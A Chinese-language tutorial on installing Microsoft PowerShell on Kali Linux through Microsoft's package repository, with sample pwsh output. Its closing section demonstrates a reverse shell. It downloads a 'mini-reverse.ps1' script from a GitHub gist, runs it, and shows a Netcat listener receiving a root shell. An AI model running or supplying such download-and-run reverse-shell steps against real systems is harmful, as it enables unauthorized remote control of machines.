Kali Linux上安裝PowerShell

PowerShell 是一個微軟開發的自動化任務和配置管理系統。它基於 .NET 框架，由命令行語言解釋器和腳本語言組成。

PowerShell 提供對 COM 和 WMI的完全訪問，從而允許系統管理員在本地或遠程 Windows 系統中 執行管理任務，以及對 WS-Management 和 CIM的訪問，實現對遠程 Linux 系統和網路設備的管理。

通過這個框架，管理任務基本上由稱為 cmdlets的 .NET 類執行。

我們首先安裝必要的依賴，在默認情況下，大多數依賴項應該已經安裝在Kali安裝中。

apt update && apt -y install curl gnupg apt-transport-https

接下來，我們需要下載並添加公共存儲庫GPG密鑰，這樣APT就可以信任包，並提醒您有關包簽名的任何問題。

curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -

添加了GPG密鑰後，我們繼續將microsoft包存儲庫添加到它自己的包列表文件中/etc/apt/sources.list.d/並更新可用軟體包的列表。

echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/powershell.list

apt update

最後，我們繼續安裝Powershell包。

apt -y install powershell

PowerShell

包安裝完成後，運行pwsh啟動PowerShell，向我們提供熟悉的「ps」提示。

root@kali:~# pwsh

PowerShell v6.1.0-preview.2

Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs

Type "help" to get help.

如果您是PowerShell新手，您首先要做的事情之一是更新內置幫助，這可以通過運行更新-幫助。這可能需要一段時間才能完成，但實際上只需要運行一次。

Updating Help for module Microsoft.PowerShell.Utility

Locating Help Content...

如你所料，在Windows上使用PowerShell時，您不會發現所有您習慣的命令，但是所有的核心模塊都已經存在，並且代碼正在不斷地開發和改進。

PS /root> Get-Process -Name gnome*

NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName

0 0.00 5.71 0.03 1073 072 gnome-keyring-d

0 0.00 9.80 0.19 659 649 gnome-session-b

0 0.00 13.72 0.36 1089 080 gnome-session-b

0 0.00 110.06 3.36 778 649 gnome-shell

0 0.00 277.15 27.85 1170 080 gnome-shell

0 0.00 11.77 0.09 1199 075 gnome-shell-cal

0 0.00 77.79 4.58 1381 080 gnome-software

0 0.00 36.58 2.03 1646 646 gnome-terminal-

使用PowerShell向Netcat偵聽器發送反向shell。

root@kali:~# pwsh

PowerShell v6.1.0-preview.2

Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs

Type "help" to get help.

PS /root> wget -qhttps://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1

PS /root> ./mini-reverse.ps1

root@kali:~# nc -lvnp 413

listening on [any] 413 ...

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 59006

id

uid=0(root) gid=0(root) groups=0(root)

uname -a

Linux kali 4.15.0-kali3-amd64 #1 SMP Debian 4.15.17-1kali1 (2018-04-25) x86_64 GNU/Linux

我們認為值得注意的是，微軟的開源PowerShell不僅不斷地更新和改進它，而且擁有一個公共的軟體包存儲庫使安裝變得非常容易。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！